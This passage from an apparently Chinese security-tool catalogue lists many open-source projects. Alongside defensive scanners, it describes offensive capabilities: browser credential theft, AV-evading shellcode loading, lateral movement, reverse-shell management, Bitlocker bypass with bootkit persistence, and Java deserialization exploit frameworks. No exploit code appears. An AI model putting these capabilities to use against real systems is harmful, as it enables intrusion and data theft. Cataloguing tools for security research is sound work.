[veinmind-sensitive](https://github.com/chaitin/veinmind-tools/blob/master/plugins/go/veinmind-sensitive) | 扫描镜像中的敏感信息 | 58 | | [veinmind-backdoor](https://github.com/chaitin/veinmind-tools/blob/master/plugins/go/veinmind-backdoor) | 扫描镜像中的后门 | 59 | | [veinmind-history](https://github.com/chaitin/veinmind-tools/blob/master/plugins/python/veinmind-history) | 扫描镜像中的异常历史命令 | 60 | | [veinmind-vuln](https://github.com/chaitin/veinmind-tools/blob/master/plugins/go/veinmind-vuln) | 扫描容器/镜像中的资产信息和漏洞 | 61 | | [veinmind-webshell](https://github.com/chaitin/veinmind-tools/blob/master/plugins/go/veinmind-webshell) | 扫描镜像中的 Webshell | 62 | | [veinmind-unsafe-mount](https://github.com/chaitin/veinmind-tools/blob/master/plugins/go/veinmind-unsafe-mount) | 扫描容器中的不安全挂载目录 | 63 | | [veinmind-iac](https://github.com/chaitin/veinmind-tools/blob/master/plugins/go/veinmind-iac) | 扫描镜像/集群的IaC文件 | 64 | | [veinmind-escape](https://github.com/chaitin/veinmind-tools/blob/master/plugins/go/veinmind-escape) | 扫描容器/镜像中的逃逸风险 | 65 | | [veinmind-privilege-escalation](https://github.com/chaitin/veinmind-tools/blob/master/plugins/go/veinmind-privilege-escalation) | 扫描容器/镜像中的提权风险 | 66 | | [veinmind-trace](https://github.com/chaitin/veinmind-tools/blob/master/plugins/go/veinmind-trace) | 扫描容器中的入侵痕迹 | 67 | 68 | PS: 目前所有工具均已支持平行容器的方式运行 69 | 70 | ## 🧑‍💻 编写插件 71 | 72 | 可以通过 example 快速创建一个 veinmind-tools 插件, 具体查看 [veinmind-example](https://github.com/chaitin/veinmind-tools/blob/master/example) 73 | 74 | ## ☁️ 云原生设施兼容性 75 | | 名称 | 类别 | 是否兼容 | 76 | |-------------------------------------------------------------|-------|------| 77 | | [Jenkins](https://github.com/chaitin/veinmind-jenkins) | CI/CD | ✔️ | 78 | | [Gitlab CI](https://veinmind.chaitin.com/docs/ci/gitlab/) | CI/CD | ✔️ | 79 | | [Github Action](https://github.com/chaitin/veinmind-action) | CI/CD | ✔️ | 80 | | DockerHub | 镜像仓库 | ✔️ | 81 | | Docker Registry | 镜像仓库 | ✔️ | 82 | | Harbor | 镜像仓库 | ✔️ | 83 | | Docker | 容器运行时 | ✔️ | 84 | | Containerd | 容器运行时 | ✔️ | 85 | | Kubernetes | 集群 | ✔️ | 86 | 87 | ## 🛴 工作原理 88 | ![](https://github.com/chaitin/veinmind-tools/raw/master/docs/architecture.png) 89 | 90 | 91 | ## 项目相关 92 | 93 | 94 | ## 最近更新 95 | 96 | #### [v2.1.5] - 2023-07-26 97 | 98 | **新增** 99 | - 新增 veinmind-trace 插件检查容器的攻击痕迹 100 | - 使用 golang 重构 veinmind-backdoor 插件 101 | - veinmind-backdoor 插件增加 rootkit 扫描 102 | 103 | **其他** 104 | - 更新 libveinmind 至 1.9.42 版本 105 | 106 | #### [v2.1.4] - 2023-07-04 107 | 108 | **新增** 109 | - 添加 veinmind-privilege-escalation 插件,用于检测权限升级风险(包括suid/sudo) 110 | 111 | **修复** 112 | - 修复libveinmind步行数据竞争错误 113 | - veinmind-weakpass 添加错误检查 114 | - 修复文档中有关如何初始化插件的描述错误 115 | - 修复 README 格式 116 | 117 | **其他** 118 | - libveinmind 更新至 1.9.21 119 | - CI 添加自动同步到 harbor 120 | 121 | #### [v2.1.3] - 2023-05-23 122 | 123 | **新增** 124 | - 新增 mysql5 弱口令扫描 125 | - 使用 bullseye 和 libveinmind-dev 更新至 1.9.15 126 | - 新增 caching_sha2_password 插件 127 | - 新增 kubernetes iac 策略插件 128 | - 新增对 env/docker 历史命令扫描 129 | 130 | **修复** 131 | - 修复 libveinmind 遍历数据竞争的问题 132 | - 优化 veinmind-malicious 代码 133 | - 修复 mysql8 弱口令检查 134 | 135 | #### [v2.1.2] - 2023-04-25 136 | 137 | **新增** 138 | - veinmind-weakpass 添加支持 ftp 139 | - veinmind-iac 添加 dockerfile 安全检测 140 | 141 | **修复** 142 | - AI模块忽略基本分析内容 143 | - makefile 添加 CGO_ENBALED 参数和依赖更新 144 | - 优化 CI/CD 的代理设置 145 | 146 | #### [v2.1.0] - 2023-03-27 147 | 148 | **更新** 149 | - 支持使用 openai 分析扫描结果 150 | 151 | 152 | -------------------------------------------------------------------------------- /detail/vultrap.md: -------------------------------------------------------------------------------- 1 | ## vultrap 2 | 3 | ![Language](https://img.shields.io/badge/Language-Python-blue) 4 | ![Author](https://img.shields.io/badge/Author-liqzz-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/liqzz/vultrap.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V0.0.1-red) 7 | ![Time](https://img.shields.io/badge/Join-20240513-green) 8 | 9 | 10 | # vultrap 11 | Build a vulnerability trap server 12 | 13 | # Install 14 | ``` 15 | docker run -p 8002:8002 -it --rm qingzhaoli/vultrap:latest trapserver 16 | ``` 17 | 18 | # Show 19 | 20 | [![asciicast](https://asciinema.org/a/yUpOFCcPOqtMJ1LJDKvG93Dtw.svg)](https://asciinema.org/a/yUpOFCcPOqtMJ1LJDKvG93Dtw) 21 | 22 | 23 | ## 项目相关 24 | 25 | 26 | ## 最近更新 27 | 28 | 29 | -------------------------------------------------------------------------------- /detail/wam.md: -------------------------------------------------------------------------------- 1 | ## wam 2 | 3 | ![Language](https://img.shields.io/badge/Language-Python-blue) 4 | ![Author](https://img.shields.io/badge/Author-knownsec404-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/knownsec/wam.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V1.0-red) 7 | ![Time](https://img.shields.io/badge/Join-20200821-green) 8 | 9 | 10 | 11 | ### Introduction 12 | 13 | WAM is a platform powered by Python to monitor "Web App", "The dynamic network information". To a certain extent, it greatly help the security researchers save time on tracking the vulnerable code updates and industry dynamics of investment. 14 | 15 | - AM Model: This module can monitor every updates on all of apps on internet, analysising the changes to make Tag and provide mail notification; 16 | 17 | - IDM Model: This module uses Web crawler to fetch the industry dynamic information and report that to users; 18 | 19 | - VDR Model: This module manager all of application package in the history, and save the updated version of which DIFF details; 20 | 21 | ### Development 22 | - Lang: Python 2.7 23 | - Framewrok: Django 1.7.11 24 | - UI: [Semantic-ui](http://www.semantic-ui.com/) 25 | - Database: Mysql 26 | 27 | ### Models 28 | 29 | - AM (App Monitoring) 30 | - IDM (Information Dynamic Monitoring) 31 | - VDR (The Relationship Between Vulnerability And Database) 32 | 33 | #### App Monitoring 34 | 35 | #### Information Dynamic Monitoring 36 | 37 | #### The Relationship Between Vulnerability And Database 38 | 39 | --- 40 | ### How to Use 41 | --- 42 | #### Step 1. Get WAM source code 43 | `git clone https://github.com/knownsec/wam.git` 44 | 45 | #### Step 2. Update settings 46 | update email server and user settings 47 | **TODO settings with dabase Storage** 48 | * `monitor/utils/local_settings.py` 49 | * `monitor/utils/email_list.py` 50 | 51 | #### Step 3. Deploy to server 52 | * **nginx** 53 | * **uwsgi** 54 | * **supervisor** 55 | 56 | Just use `wam/conf` config files to deploy your wam code 57 | 58 | #### PS. WAM with LDAP auth 59 | 60 | Essentially, need to ensure you have the necessary development libraries installed: 61 | 62 | `apt-get install libsasl2-dev python-dev libldap2-dev libssl-dev` 63 | 64 | then `pip install python-ldap` 65 | and uncomment `wam/settings.py` 66 | `AUTHENTICATION_BACKENDS` to 67 | 68 | ```` 69 | AUTHENTICATION_BACKENDS = ( 70 | 'wam.ldap_backend.LDAPBackend', # 如果想使LDAP 认证取消注释 71 | 'django.contrib.auth.backends.ModelBackend', 72 | ) 73 | ```` 74 | 75 | 76 | 77 | ## 项目相关 78 | 79 | 80 | ## 最近更新 81 | 82 | 83 | -------------------------------------------------------------------------------- /detail/ysomap.md: -------------------------------------------------------------------------------- 1 | ## ysomap 2 | 3 | ![Language](https://img.shields.io/badge/Language-Java-blue) 4 | ![Author](https://img.shields.io/badge/Author-wh1t3p1g-orange) 5 | ![GitHub stars](https://img.shields.io/github/stars/wh1t3p1g/ysomap.svg?style=flat&logo=github) 6 | ![Version](https://img.shields.io/badge/Version-V0.1.4-red) 7 | ![Time](https://img.shields.io/badge/Join-20211122-green) 8 | 9 | 10 | 11 | Ysomap是一款适配于各类实际复杂环境的Java反序列化利用框架,可动态配置具备不同执行效果的Java反序列化利用链payload,以应对不同场景下的反序列化利用。 12 | 13 | 此外,ysomap支持多种exploits,用于生成或配置一些evil server,或者是常见漏洞的exp。 14 | ``` 15 | [+] exploits(11) payloads(31) bullets(28) 16 | ``` 17 | ## #1 如何使用 18 | 19 | ### 生成 20 | 由于最新版XStream的payload需要JDK8的环境进行编译,所以后续运行需在JDK8的环境下运行 21 | 22 | 使用`mvn clean package -DskipTests` 23 | 24 | 生成的jar位于`cli/target/ysomap.jar` 25 | 26 | 版本>=v0.0.1支持两种运行模式 27 | 28 | 1. cli模式 29 | 执行`java -jar ysomap.jar cli`,终端模式 30 | 31 | 2. script模式 32 | 执行`java -jar ysomap.jar script /path/to/script.yso`,脚本模式 33 | 34 | ps: 后续版本为了适配XStream的相关gadget加入了很多jdk的对象,所以如果要使用xstream的gadget,ysomap最好运行在jdk8的环境下。 35 | ### 基础使用方法 36 | 37 | 参见[YSOMAP食用指北](https://github.com/wh1t3p1g/ysomap/wiki/YSOMAP%E9%A3%9F%E7%94%A8%E6%8C%87%E5%8C%97) 38 | 39 | ## #2 当前进度 40 | 41 | ### DONE 42 | 43 | - [x] 支持CommonsCollections系列payload 44 | - [x] 支持执行效果bullet:远程jar载入、命令执行、代码执行、发起jndi效果、tomcat内存马、延时判断、文件写入、socket shell。 45 | - [x] 支持现有RMI系列攻击包 [原理1](http://blog.0kami.cn/2020/02/06/rmi-registry-security-problem/) [原理2](http://blog.0kami.cn/2020/02/09/jndi-with-rmi/) [原理3](https://mogwailabs.de/blog/2020/02/an-trinhs-rmi-registry-bypass/) 46 | - [x] 支持现有LDAP系列攻击包 [原理](http://blog.0kami.cn/2020/03/01/jndi-with-ldap/) 47 | - [x] 支持HTTP服务动态挂载恶意的class文件或jar文件 48 | - [x] 支持URLDNS 49 | - [x] 支持现有JMX系列攻击包 [原理](http://blog.0kami.cn/2020/03/10/java-jmx-rmi/) 50 | - [x] 支持fastjson JdbcRowSetImpl、TemplatesImpl gadget [原理](http://blog.0kami.cn/2020/04/13/talk-about-fastjson-deserialization/) 51 | - [x] 支持现有XStream系列payload包 [原理](http://blog.0kami.cn/2020/04/18/talk-about-xstream-deserialization/) 52 | - [x] 支持weblogic XMLDecoder payloads 53 | 54 | ### TODO 55 | 56 | - [ ] 支持weblogic系列攻击包 57 | - [ ] 支持websphere系列攻击包 58 | 59 | ## #3 由来 60 | 61 | 在实际分析ysoserial的利用链时,有时候会觉得框架写的太死,有以下几个缺点: 62 | 63 | 1. 同一个利用链如果想改变一下最后的利用效果,如命令执行改成代码执行,我们需要改写这个利用链或者是重新增加一个利用链。这时,我们其实可以看到利用链的前半部分是不变的,变的只是后续的利用效果。 64 | 2. ysoserial仅实现了常规的序列化利用链,对于类似JSON格式的序列化利用链,以当前的这个框架扩展起来会比较麻烦 65 | 66 | 所以萌生了开发一个更加灵活的框架来扩展反序列化利用链,也就是当前这个试验品ysomap。 67 | 68 | PS:YSOMAP项目为另一个项目的子项目,后续将开源该项目,敬请期待...... 69 | 70 | ## #4 原理 71 | 72 | 我将利用链切分成了两个部分**payload**和**bullet**: 73 | 74 | 1. payload:指代利用链的前序部分 75 | 2. bullet:指代最终利用链可达成的效果 76 | 77 | #### 实际案例分析 78 | 79 | CommonsCollection1和3,在分析时我们可以看到实际1和3的区别在于1使用的是`InvokerTransformer`,而3使用的是`templatesImpl`的方式。那么提取相同的前序payload部分,我们只需写两个不同的bullet即可。而且这两个bullet也同样能被用在其他的payload上。 80 | 81 | 实际还有就是我在写RMIRegistryExploit时,也有这种可将不变部分重用的地方,而无需2,3之类的出现。 82 | 83 | 84 | 85 | ## 项目相关 86 | 87 | - 2021-11-24 发布文章[《ysomap : Java反序列化利用框架》](https://mp.weixin.qq.com/s/WluThXve9hLoJQ8hnyfLgA) 88 | 89 | ## 最近更新 90 | 91 | #### [v0.1.4] - 2022-10-15 92 | 93 | **更新** 94 | - 新增 16 exploits, 12 payloads, 9 bullets 95 | - 新增 yso 脚本支持 96 | - 使用 `script /path/to/file.yso` 加载 yso 脚本(cli 模式下) 97 | - 使用 `dump /path/to/file.yso` 导出当前会话设置(cli 模式下) 98 | - 使用 `java -jar ysomap.jar cli` 触发 cli 模式 99 | - 使用 `java -jar ysomap.jar script /path/to/file.yso` 触发脚本模式 100 | 101 | #### [v0.1.3] - 2022-04-15 102 | 103 | **更新** 104 | - 新增若干payloads、bullets,目前共计 [+] exploits(12) payloads(31) bullets(36) 105 | - 支持设置编码器、输出方式、serialVersionUid、序列器类型,具体方法见wiki 106 | 107 | 108 | -------------------------------------------------------------------------------- /information_analysis.md: -------------------------------------------------------------------------------- 1 | ## 信息分析 / information_analysis 2 | 3 | 1. [HackBrowserData](#hackbrowserdata) 4 | 2. [KunLun-M](#kunlun-m) 5 | 3. [Pillager](#pillager) 6 | 4. [AppScan](#appscan) 7 | 5. [frida-skeleton](#frida-skeleton) 8 | 6. [java-object-searcher](#java-object-searcher) 9 | 7. [js-cookie-monitor-debugger-hook](#js-cookie-monitor-debugger-hook) 10 | 8. [MySQLMonitor](#mysqlmonitor) 11 | 9. [CodeReviewTools](#codereviewtools) 12 | 13 | ---------------------------------------- 14 | 15 | ### [HackBrowserData](detail/HackBrowserData.md) 16 | ![Author](https://img.shields.io/badge/Author-moonD4rk-orange) 17 | ![Language](https://img.shields.io/badge/Language-Golang-blue) 18 | ![GitHub stars](https://img.shields.io/github/stars/moonD4rk/HackBrowserData.svg?style=flat&logo=github) 19 | ![Version](https://img.shields.io/badge/Version-V0.4.6-red) 20 | 21 | 22 | 23 | hack-browser-data 是一个解密浏览器数据(密码/历史记录/Cookies/书签)的导出工具,支持全平台主流浏览器的数据导出窃取。 24 | 25 | ### [KunLun-M](detail/KunLun-M.md) 26 | ![Author](https://img.shields.io/badge/Author-LoRexxar-orange) 27 | ![Language](https://img.shields.io/badge/Language-Python-blue) 28 | ![GitHub stars](https://img.shields.io/github/stars/LoRexxar/Kunlun-M.svg?style=flat&logo=github) 29 | ![Version](https://img.shields.io/badge/Version-V2.6.5-red) 30 | 31 | 32 | 33 | KunLun-M是一个完全开源的静态白盒扫描工具,支持PHP、JavaScript的语义扫描,基础安全、组件安全扫描,Chrome Ext\Solidity的基础扫描。 34 | 35 | ### [Pillager](detail/Pillager.md) 36 | ![Author](https://img.shields.io/badge/Author-qwqdanchun-orange) 37 | ![Language](https://img.shields.io/badge/Language-C#-blue) 38 | ![GitHub stars](https://img.shields.io/github/stars/qwqdanchun/Pillager.svg?style=flat&logo=github) 39 | ![Version](https://img.shields.io/badge/Version-V0.0.1-red) 40 | 41 | 42 | 43 | Pillager是一个适用于后渗透期间的信息收集工具,可以收集目标机器上敏感信息,方便下一步渗透工作的进行。 44 | 45 | ### [AppScan](detail/AppScan.md) 46 | ![Author](https://img.shields.io/badge/Author-TongchengOpenSource-orange) 47 | ![Language](https://img.shields.io/badge/Language-Python-blue) 48 | ![GitHub stars](https://img.shields.io/github/stars/TongchengOpenSource/AppScan.svg?style=flat&logo=github) 49 | ![Version](https://img.shields.io/badge/Version-V2.1.5-red) 50 | 51 | 52 | 53 | 安全隐私卫士(AppScan)一款免费的企业级自动化App隐私合规检测工具 54 | 55 | ### [frida-skeleton](detail/frida-skeleton.md) 56 | ![Author](https://img.shields.io/badge/Author-Margular-orange) 57 | ![Language](https://img.shields.io/badge/Language-Python-blue) 58 | ![GitHub stars](https://img.shields.io/github/stars/Margular/frida-skeleton.svg?style=flat&logo=github) 59 | ![Version](https://img.shields.io/badge/Version-V3.3-red) 60 | 61 | 62 | 63 | frida-skeleton是基于frida的安卓hook框架,提供了很多frida自身不支持的功能,将hook安卓变成简单便捷,人人都会的事情。 64 | 65 | ### [java-object-searcher](detail/java-object-searcher.md) 66 | ![Author](https://img.shields.io/badge/Author-c0ny1-orange) 67 | ![Language](https://img.shields.io/badge/Language-Java-blue) 68 | ![GitHub stars](https://img.shields.io/github/stars/c0ny1/java-object-searcher.svg?style=flat&logo=github) 69 | ![Version](https://img.shields.io/badge/Version-V0.1.0-red) 70 | 71 | 72 | 73 | java内存对象搜索辅助工具,配合IDEA在Java应用运行时,对内存中的对象进行搜索。比如可以可以用挖掘request对象用于回显等场景。 74 | 75 | ### [js-cookie-monitor-debugger-hook](detail/js-cookie-monitor-debugger-hook.md) 76 | ![Author](https://img.shields.io/badge/Author-JSREI-orange) 77 | ![Language](https://img.shields.io/badge/Language-JavaScript-blue) 78 | ![GitHub stars](https://img.shields.io/github/stars/JSREI/js-cookie-monitor-debugger-hook.svg?style=flat&logo=github) 79 | ![Version](https://img.shields.io/badge/Version-V0.11.0-red) 80 | 81 | 82 | 83 | js cookie逆向利器:js cookie变动监控可视化工具 & js cookie hook打条件断点 84 | 85 | ### [MySQLMonitor](detail/MySQLMonitor.md) 86 | ![Author](https://img.shields.io/badge/Author-TheKingOfDuck-orange) 87 | ![Language](https://img.shields.io/badge/Language-Java-blue) 88 | ![GitHub stars](https://img.shields.io/github/stars/TheKingOfDuck/MySQLMonitor.svg?style=flat&logo=github) 89 | ![Version](https://img.shields.io/badge/Version-V1.0.0-red) 90 | 91 | 92 | 93 | MySQL实时监控工具(代码审计/黑盒/白盒审计辅助工具) 94 | 95 | ### [CodeReviewTools](detail/CodeReviewTools.md) 96 | ![Author](https://img.shields.io/badge/Author-Ppsoft1991-orange) 97 | ![Language](https://img.shields.io/badge/Language-Java-blue) 98 | ![GitHub stars](https://img.shields.io/github/stars/Ppsoft1991/CodeReviewTools.svg?style=flat&logo=github) 99 | ![Version](https://img.shields.io/badge/Version-V1.1.0-red) 100 | 101 | 102 | 103 | CodeReviewTools是一个可以快速批量反编译jar包的工具,为审计Java代码做好第一步。 104 | 105 | -------------------------------------------------------------------------------- /intranet_tools.md: -------------------------------------------------------------------------------- 1 | ## 内网工具 / intranet_tools 2 | 3 | 1. [fscan](#fscan) 4 | 2. [antSword](#antsword) 5 | 3. [Stowaway](#stowaway) 6 | 4. [shellcodeloader](#shellcodeloader) 7 | 5. [ServerScan](#serverscan) 8 | 6. [Platypus](#platypus) 9 | 7. [WMIHACKER](#wmihacker) 10 | 8. [rakshasa](#rakshasa) 11 | 9. [As-Exploits](#as-exploits) 12 | 10. [g3proxy](#g3proxy) 13 | 11. [PortForward](#portforward) 14 | 15 | ---------------------------------------- 16 | 17 | ### [fscan](detail/fscan.md) 18 | ![Author](https://img.shields.io/badge/Author-shadow1ng-orange) 19 | ![Language](https://img.shields.io/badge/Language-Golang-blue) 20 | ![GitHub stars](https://img.shields.io/github/stars/shadow1ng/fscan.svg?style=flat&logo=github) 21 | ![Version](https://img.shields.io/badge/Version-V2.0.0-red) 22 | 23 | 24 | 25 | 一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。 26 | 27 | ### [antSword](detail/antSword.md) 28 | ![Author](https://img.shields.io/badge/Author-AntSwordProject-orange) 29 | ![Language](https://img.shields.io/badge/Language-Nodejs-blue) 30 | ![GitHub stars](https://img.shields.io/github/stars/AntSwordProject/antSword.svg?style=flat&logo=github) 31 | ![Version](https://img.shields.io/badge/Version-V2.1.15-red) 32 | 33 | 34 | 35 | 中国蚁剑是一款开源的跨平台网站管理工具。 36 | 37 | ### [Stowaway](detail/Stowaway.md) 38 | ![Author](https://img.shields.io/badge/Author-ph4ntonn-orange) 39 | ![Language](https://img.shields.io/badge/Language-Golang-blue) 40 | ![GitHub stars](https://img.shields.io/github/stars/ph4ntonn/Stowaway.svg?style=flat&logo=github) 41 | ![Version](https://img.shields.io/badge/Version-V2.2-red) 42 | 43 | 44 | 45 | Stowaway 是一款多级代理工具,可将外部流量通过多个节点代理至内网,突破内网访问限制。Stowaway 可以方便渗透测试人员通过多级跳跃,从外部dmz等一系列区域逐步深入核心网络;Stowaway 除了流量转发功能,还提供了端口复用、ssh隧道,流量伪装等专为渗透测试人员所用的功能。 46 | 47 | ### [shellcodeloader](detail/shellcodeloader.md) 48 | ![Author](https://img.shields.io/badge/Author-m0ngo0se@knownsec404-orange) 49 | ![Language](https://img.shields.io/badge/Language-C++-blue) 50 | ![GitHub stars](https://img.shields.io/github/stars/knownsec/shellcodeloader.svg?style=flat&logo=github) 51 | ![Version](https://img.shields.io/badge/Version-V1.1-red) 52 | 53 | 54 | 55 | Windows平台的shellcode免杀加载器,自带多种加载方式:32位自带13种加载方式,64位自带12种加载方式。 56 | 57 | ### [ServerScan](detail/ServerScan.md) 58 | ![Author](https://img.shields.io/badge/Author-Adminisme-orange) 59 | ![Language](https://img.shields.io/badge/Language-Golang-blue) 60 | ![GitHub stars](https://img.shields.io/github/stars/Adminisme/ServerScan.svg?style=flat&logo=github) 61 | ![Version](https://img.shields.io/badge/Version-V1.0.2-red) 62 | 63 | 64 | 65 | 一款使用Golang开发且适用于攻防演习内网横向信息收集的高并发网络扫描、服务探测工具。 66 | 67 | ### [Platypus](detail/Platypus.md) 68 | ![Author](https://img.shields.io/badge/Author-WangYihang-orange) 69 | ![Language](https://img.shields.io/badge/Language-Golang-blue) 70 | ![GitHub stars](https://img.shields.io/github/stars/WangYihang/Platypus.svg?style=flat&logo=github) 71 | ![Version](https://img.shields.io/badge/Version-V1.5.0-red) 72 | 73 | 74 | 75 | Platypus 是一个基于终端与 Web UI 交互式的反弹 Shell 会话管理工具。在实际的渗透测试中,为了解决 Netcat/Socat 等工具在文件传输、多会话管理方面的不足。该工具在多会话管理的基础上增加了在渗透测试中更加有用的功能,可以更方便灵活地对反弹 Shell 会话进行管理。 76 | 77 | ### [WMIHACKER](detail/WMIHACKER.md) 78 | ![Author](https://img.shields.io/badge/Author-rootclay-orange) 79 | ![Language](https://img.shields.io/badge/Language-VBScript-blue) 80 | ![GitHub stars](https://img.shields.io/github/stars/rootclay/WMIHACKER.svg?style=flat&logo=github) 81 | ![Version](https://img.shields.io/badge/Version-V0.0.1-red) 82 | 83 | 84 | 85 | WMIHACKER是一款免杀横向渗透远程命令执行工具,常见的WMIEXEC、PSEXEC执行命令是创建服务或调用Win32_Process.create执行命令,这些方式都已经被杀软100%拦截,通过改造出的WMIHACKER可免杀横向移动。并且在企业网络目前阻断445端口严重的情况下可以无需445端口进行横向移动,效率高且不易被检测。 86 | 87 | ### [rakshasa](detail/rakshasa.md) 88 | ![Author](https://img.shields.io/badge/Author-Mob2003-orange) 89 | ![Language](https://img.shields.io/badge/Language-Golang-blue) 90 | ![GitHub stars](https://img.shields.io/github/stars/Mob2003/rakshasa.svg?style=flat&logo=github) 91 | ![Version](https://img.shields.io/badge/Version-V0.2.3-red) 92 | 93 | 94 | 95 | rakshasa是一个使用Go语言编写的强大多级代理工具,专为实现多级代理,内网穿透而设计。它可以在节点群里面任意两个节点之间转发TCP请求和响应,同时支持socks5代理,http代理,并且可以引入外部http、socks5代理池,自动切换请求IP。 96 | 97 | ### [As-Exploits](detail/As-Exploits.md) 98 | ![Author](https://img.shields.io/badge/Author-yzddmr6-orange) 99 | ![Language](https://img.shields.io/badge/Language-JavaScript-blue) 100 | ![GitHub stars](https://img.shields.io/github/stars/yzddmr6/As-Exploits.svg?style=flat&logo=github) 101 | ![Version](https://img.shields.io/badge/Version-V1.5.0-red) 102 | 103 | 104 | 105 | 中国蚁剑后渗透框架 106 | 107 | ### [g3proxy](detail/g3proxy.md) 108 | ![Author](https://img.shields.io/badge/Author-bytedance-orange) 109 | ![Language](https://img.shields.io/badge/Language-Rust-blue) 110 | ![GitHub stars](https://img.shields.io/github/stars/bytedance/g3.svg?style=flat&logo=github) 111 | ![Version](https://img.shields.io/badge/Version-V1.10.4-red) 112 | 113 | 114 | 115 | 通用正向代理解决方案,同时带有TCP映射、TLS卸载/封装、透明代理、简单反向代理等功能 116 | 117 | ### [PortForward](detail/PortForward.md) 118 | ![Author](https://img.shields.io/badge/Author-knownsec404-orange) 119 | ![Language](https://img.shields.io/badge/Language-Golang-blue) 120 | ![GitHub stars](https://img.shields.io/github/stars/knownsec/PortForward.svg?style=flat&logo=github) 121 | ![Version](https://img.shields.io/badge/Version-V0.5.0-red) 122 | 123 | 124 | 125 | PortForward 是使用 Golang 进行开发的端口转发工具,解决在某些场景下内外网无法互通的问题 126 | 127 | -------------------------------------------------------------------------------- /others.md: -------------------------------------------------------------------------------- 1 | ## 其他 / others 2 | 3 | 1. [f8x](#f8x) 4 | 2. [BinAbsInspector](#binabsinspector) 5 | 3. [Heimdallr](#heimdallr) 6 | 4. [passive-scan-client](#passive-scan-client) 7 | 5. [AiPy](#aipy) 8 | 6. [GrabAccess](#grabaccess) 9 | 7. [wam](#wam) 10 | 8. [LBot](#lbot) 11 | 12 | ---------------------------------------- 13 | 14 | ### [f8x](detail/f8x.md) 15 | ![Author](https://img.shields.io/badge/Author-ffffffff0x-orange) 16 | ![Language](https://img.shields.io/badge/Language-Bash-blue) 17 | ![GitHub stars](https://img.shields.io/github/stars/ffffffff0x/f8x.svg?style=flat&logo=github) 18 | ![Version](https://img.shields.io/badge/Version-V1.6.2-red) 19 | 20 | 21 | 22 | 一款红/蓝队环境自动化部署工具,支持多种场景,渗透,开发,代理环境,服务可选项等。 23 | 24 | ### [BinAbsInspector](detail/BinAbsInspector.md) 25 | ![Author](https://img.shields.io/badge/Author-KeenSecurityLab-orange) 26 | ![Language](https://img.shields.io/badge/Language-Java-blue) 27 | ![GitHub stars](https://img.shields.io/github/stars/KeenSecurityLab/BinAbsInspector.svg?style=flat&logo=github) 28 | ![Version](https://img.shields.io/badge/Version-V0.1-red) 29 | 30 | 31 | 32 | BinAbsInspector(Binary Abstract Inspector)是一款用于自动化逆向工程和扫描二进制文件漏洞的静态分析器,是 Keenlab 孵化的长期研究项目。基于 Ghidra 的支持下的抽象解释,适用于 Ghidra 的 Pcode 而非汇编。目前支持 x86、x64、armv7 和 aarch64 的二进制文件。 33 | 34 | ### [Heimdallr](detail/Heimdallr.md) 35 | ![Author](https://img.shields.io/badge/Author-graynjo-orange) 36 | ![Language](https://img.shields.io/badge/Language-JavaScript-blue) 37 | ![GitHub stars](https://img.shields.io/github/stars/graynjo/Heimdallr.svg?style=flat&logo=github) 38 | ![Version](https://img.shields.io/badge/Version-V1.1.3-red) 39 | 40 | 41 | 42 | 一款完全被动监听的谷歌插件,用于高危指纹识别、蜜罐特征告警和拦截、机器特征对抗。 43 | 44 | ### [passive-scan-client](detail/passive-scan-client.md) 45 | ![Author](https://img.shields.io/badge/Author-c0ny1-orange) 46 | ![Language](https://img.shields.io/badge/Language-Java-blue) 47 | ![GitHub stars](https://img.shields.io/github/stars/c0ny1/passive-scan-client.svg?style=flat&logo=github) 48 | ![Version](https://img.shields.io/badge/Version-V0.3.1-red) 49 | 50 | 51 | 52 | Passive Scan Client是一款可以将经过筛选的流量转发到指定代理的Burp被动扫描流量转发插件 53 | 54 | ### [AiPy](detail/AiPy.md) 55 | ![Author](https://img.shields.io/badge/Author-Knownsec-orange) 56 | ![Language](https://img.shields.io/badge/Language-Python-blue) 57 | ![GitHub stars](https://img.shields.io/github/stars/knownsec/aipyapp.svg?style=flat&logo=github) 58 | ![Version](https://img.shields.io/badge/Version-V0.1.28-red) 59 | 60 | 61 | 62 | AiPy是知道创宇站在AI技术变革前沿,基于LLM(大语言模型)与高级编程语言Python 完美融合,打造的一款突破性产品。AiPy以创新的技术范式和更低的成本,重构AI生产力边界,让大模型集思考能力和主动执行任务于一体。 63 | 64 | ### [GrabAccess](detail/GrabAccess.md) 65 | ![Author](https://img.shields.io/badge/Author-Push3AX-orange) 66 | ![Language](https://img.shields.io/badge/Language-C-blue) 67 | ![GitHub stars](https://img.shields.io/github/stars/Push3AX/GrabAccess.svg?style=flat&logo=github) 68 | ![Version](https://img.shields.io/badge/Version-V1.1-red) 69 | 70 | 71 | 72 | GrabAccess:Bookit/Windows登陆密码和Bitlocker绕过工具,在物理接触目标计算机的情况下,GrabAccess可以:绕过Windows登陆密码执行任意操作(以System权限执行命令、重置Windows账户密码等),植入木马并添加自启动(可以绕过Bitlocker,但要求受害者登录),通过修改主板UEFI固件实现无视重装系统、更换硬盘的持久化(Bootkit) 73 | 74 | ### [wam](detail/wam.md) 75 | ![Author](https://img.shields.io/badge/Author-knownsec404-orange) 76 | ![Language](https://img.shields.io/badge/Language-Python-blue) 77 | ![GitHub stars](https://img.shields.io/github/stars/knownsec/wam.svg?style=flat&logo=github) 78 | ![Version](https://img.shields.io/badge/Version-V1.0-red) 79 | 80 | 81 | 82 | WAM是一个由Python开发的用于监控'Web App'、'动态网络信息'的平台。在一定程度上,它极大地帮助安全研究人员节省了跟踪代码补丁的时间。 83 | 84 | ### [LBot](detail/LBot.md) 85 | ![Author](https://img.shields.io/badge/Author-LoRexxar@knownsec404-orange) 86 | ![Language](https://img.shields.io/badge/Language-Python-blue) 87 | ![GitHub stars](https://img.shields.io/github/stars/knownsec/LBot.svg?style=flat&logo=github) 88 | ![Version](https://img.shields.io/badge/Version-V0.0.1-red) 89 | 90 | 91 | 92 | LBot主要用于方便的编写一个xss的bot程序。使用者可以简单的修改其逻辑以及配置环境,即可获得一个简单的xss的bot程序。由于原型来自于爬虫程序,所以只要前端有一定的频率限制,后端很难出现问题,比较稳定。 93 | 94 | -------------------------------------------------------------------------------- /vulnerability_assessment.md: -------------------------------------------------------------------------------- 1 | ## 漏洞探测 / 